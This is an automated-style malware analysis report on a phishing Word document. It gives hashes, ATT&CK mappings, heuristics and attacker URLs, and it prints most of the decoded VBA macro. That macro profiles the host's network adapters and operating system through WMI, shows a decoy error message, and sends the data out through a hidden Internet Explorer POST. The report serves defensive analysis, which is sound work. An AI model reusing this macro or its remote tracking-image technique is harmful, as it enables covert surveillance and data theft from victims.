Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f426b4b5c8081080…

MALICIOUS

Office (OOXML)

Size: 38.4 KB
Created: 2020-02-10 07:30:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2020-07-24
MD5: 8e3267ff5d48616492289b8a86a61683
SHA-1: 516b515cde9427d73c309db878336628c6ad71e8
SHA-256: f426b4b5c80810807d5ca844098e19650e17b703402d1985b7d7724e184aec90
Risk score: 150

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 Malicious File

The OOXML document contains VBA macros, indicated by the 'OOXML_VBA' heuristic. The script uses 'CreateObject' and 'GetObject' calls, suggesting it attempts to interact with the system or download external content. The presence of a remote image URL in the document's relationships and the VBA code's structure point towards a macro-based downloader. The document body presents a fake form, urging the user to 'Enable Content', a common social engineering tactic.

Heuristics (7)

  • VBA project inside OOXML [OOXML_VBA] (severity: medium; 3 related findings)
    Document contains a VBA project (VBA macros present)
  • CreateObject call [OLE_VBA_CREATEOBJ] (severity: high)
    CreateObject call
  • GetObject call [OLE_VBA_GETOBJ] (severity: high)
    GetObject call
  • Environ() call (env variable access) [OLE_VBA_ENVIRON] (severity: low)
    Environ() call (env variable access)
  • Remote image (web beacon / tracking pixel) [OOXML_IMAGE_BEACON] (severity: medium)
    Document references an external image URL that loads automatically on open, revealing the IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
  • External relationship [OOXML_EXTERNAL_REL] (severity: medium)
    External target in word/_rels/document.xml.rels: https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi
  • Embedded URL [EMBEDDED_URL] (severity: info)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://24ikamf3ld3rlmmg6h6xdn6av3m3n2dc.sso.ingos.su/static/image.png?user_rid=b2wqtxw25dq6qkuvuh75hoj5csumouwi (OOXML external relationship)
    • https://post.ingos.su/035acff221d8cb7d882cc8e8a64169f482adb3cdfa6b7912 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5190 bytes
SHA-256: 22f0950305fe309caf37145b0a0bcfda075234a6cbe6bfab1d795b959c0e012d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"
Private Sub CommandButton1_Click()
   
    ' Decoy message shown when the fake form button is clicked (Russian: "An error occurred.")
    MsgBox ("Произошла ошибка.")
    Module1.phxUC
End Sub

Attribute VB_Name = "Module1"
' Builds a random alphanumeric string of the given length (used below as the multipart boundary)
Function MoRwAl(Length As Integer)
Dim cyZfAYwgIIfFvIsATgJwiTdY As Variant
Dim JPdNU As Long
Dim fOTTnnWjFVt As String
cyZfAYwgIIfFvIsATgJwiTdY = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", _
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", _
"y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", _
"A", "B", "C", "D", "E", "F", "G", "H", _
"I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", _
"W", "X", "Y", "Z")
For JPdNU = 1 To Length
Randomize
fOTTnnWjFVt = fOTTnnWjFVt & cyZfAYwgIIfFvIsATgJwiTdY(Int((UBound(cyZfAYwgIIfFvIsATgJwiTdY) - LBound(cyZfAYwgIIfFvIsATgJwiTdY) + 1) * Rnd + LBound(cyZfAYwgIIfFvIsATgJwiTdY)))
Next JPdNU
MoRwAl = fOTTnnWjFVt
End Function
' Collects the IP addresses and descriptions of all IP-enabled network adapters via WMI
Function tDZSy() As String
Dim lkbYi As String
Dim nyUIrqdl As Object
Dim tHpbaCSZwbtwawWuUBFoJryI As Object
Dim HKajOgmuWKoQWMJvgfQJC As Object
Dim twWEGMifiAjaJPBvyTSc As String
Dim ZYMGcZyIK As Integer
lkbYi = "."
twWEGMifiAjaJPBvyTSc = ""
Set nyUIrqdl = GetObject("winmgmts:\\" & lkbYi & "\root\cimv2")
Set tHpbaCSZwbtwawWuUBFoJryI = nyUIrqdl.ExecQuery _
("Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")
For Each HKajOgmuWKoQWMJvgfQJC In tHpbaCSZwbtwawWuUBFoJryI
If Not IsNull(HKajOgmuWKoQWMJvgfQJC.IPAddress) Then
For ZYMGcZyIK = LBound(HKajOgmuWKoQWMJvgfQJC.IPAddress) To UBound(HKajOgmuWKoQWMJvgfQJC.IPAddress)
twWEGMifiAjaJPBvyTSc = twWEGMifiAjaJPBvyTSc & HKajOgmuWKoQWMJvgfQJC.IPAddress(ZYMGcZyIK) & " " & HKajOgmuWKoQWMJvgfQJC.Description(ZYMGcZyIK) & vbCrLf
Next
End If
Next
tDZSy = twWEGMifiAjaJPBvyTSc
End Function
' Collects the operating system caption and version via WMI
Function CWiZQLNpdAQY() As String
Dim zxTFxoDfJgbnQyQpJIEtUfd As String
Dim PQXxhwIJVZcCOcNKyMRrwmpO As Object
Dim uBtVUmuNzC As Object
Dim VAklWhN As Object
Dim GXMsv As String
zxTFxoDfJgbnQyQpJIEtUfd = "."
GXMsv = ""
Set PQXxhwIJVZcCOcNKyMRrwmpO = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & zxTFxoDfJgbnQyQpJIEtUfd & "\root\cimv2")
Set uBtVUmuNzC = PQXxhwIJVZcCOcNKyMRrwmpO.ExecQuery("Select * from Win32_OperatingSystem")
For Each VAklWhN In uBtVUmuNzC
GXMsv = GXMsv & VAklWhN.Caption & " " & VAklWhN.Version & vbCrLf
Next
CWiZQLNpdAQY = GXMsv
End Function
' Sends the prepared multipart/form-data body to the given URL through a hidden Internet Explorer COM object
Sub DQDAaDiPKwRESWiCI(JfoSKuANf As String, olGjMVgRkXODBJPZQhwv As String, gAvRlZFgn As String)
Dim WebBrowser: Set WebBrowser = CreateObject("InternetExplorer.Application")
Dim XZHaouZuPbyfqRWWaZNM() As Byte
ReDim XZHaouZuPbyfqRWWaZNM(Len(olGjMVgRkXODBJPZQhwv) - 1)
XZHaouZuPbyfqRWWaZNM = StrConv(olGjMVgRkXODBJPZQhwv, vbFromUnicode)
WebBrowser.Navigate JfoSKuANf, 2 + 4 + 8, , XZHaouZuPbyfqRWWaZNM, _
"Content-type: multipart/form-data; boundary=" + gAvRlZFgn + Chr(10) + Chr(13)
Do While WebBrowser.busy
DoEvents
Loop
WebBrowser.Quit
End Sub
' Assembles a two-field multipart/form-data body around the boundary and hands it to the sender above
Function pCnvrdistEp(vpaITyBBcRHDlWGGLNHTKinF As String, CtPjMmpKcDPobsHCyjvI As String, EgkQuHSMoxSYAml As String, nmfOQmboODoOModusSqV As String, bPppYAdTwBJWNywIegr As String, sthptmT As String, Optional ByVal bAsync As Boolean) As String
Dim uUNyb As String
uUNyb = "--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & bPppYAdTwBJWNywIegr & "" & vbCrLf & vbCrLf & _
sthptmT & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & vbCrLf & _
"Content-Disposition: form-data; name=" & CtPjMmpKcDPobsHCyjvI & "" & vbCrLf & vbCrLf & _
nmfOQmboODoOModusSqV & vbCrLf & _
"--" & vpaITyBBcRHDlWGGLNHTKinF & "--"
DQDAaDiPKwRESWiCI EgkQuHSMoxSYAml, uUNyb, vpaITyBBcRHDlWGGLNHTKinF
End Function
' Formats the collected host information into the report text (listing truncated below)
Function NmXAAKfdkIGGRFhOW(os As String) As String
Dim yMKTmQMviBN As String
yMKTmQMviBN = Chr(10) & "User:" & E
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 36352 bytes
SHA-256: 8c15345d566f56a544778923f925fca3217c187942de6cae1902b7e642822125